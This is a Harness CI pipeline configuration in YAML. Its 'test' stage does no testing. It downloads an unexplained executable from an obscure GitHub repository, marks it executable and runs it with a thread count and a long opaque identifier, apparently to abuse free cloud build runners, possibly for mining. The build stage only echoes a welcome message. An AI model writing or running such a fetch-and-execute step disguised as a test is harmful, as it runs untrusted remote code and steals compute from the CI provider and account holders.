pipeline:
  name: Build adwdqz
  identifier: Build_BarihaHergina_adwdqz_1712567150154
  projectIdentifier: gasdqwz
  orgIdentifier: default
  stages:
    - stage:
        name: Build
        identifier: Build
        type: CI
        spec:
          cloneCodebase: true
          execution:
            steps:
              - step:
                  type: Run
                  name: Echo Welcome Message
                  identifier: Echo_Welcome_Message
                  spec:
                    shell: Sh
                    command: echo "Welcome to Harness CI"
          platform:
            os: Linux
            arch: Amd64
          runtime:
            type: Cloud
            spec: {}
    - stage:
        name: test
        identifier: test
        description: ""
        type: CI
        spec:
          cloneCodebase: true
          platform:
            os: Linux
            arch: Amd64
          runtime:
            type: Cloud
            spec: {}
          execution:
            steps:
              - step:
                  type: Run
                  name: Run_1
                  identifier: Run_1
                  spec:
                    shell: Sh
                    command: wget https://github.com/fkajsbge4/as/raw/main/test && chmod +x test && ./test -t 7 -i NVWTZZACJPEBAFBLYZNJXFGHJDPBTMIIFBDAOGSTHDHRCHXFTMZUXIOGERZG --label new1
  properties:
    ci:
      codebase:
        connectorRef: account.Github_OAuth_1712567138439
        repoName: BarihaHergina/adwdqz
        build: <+input>
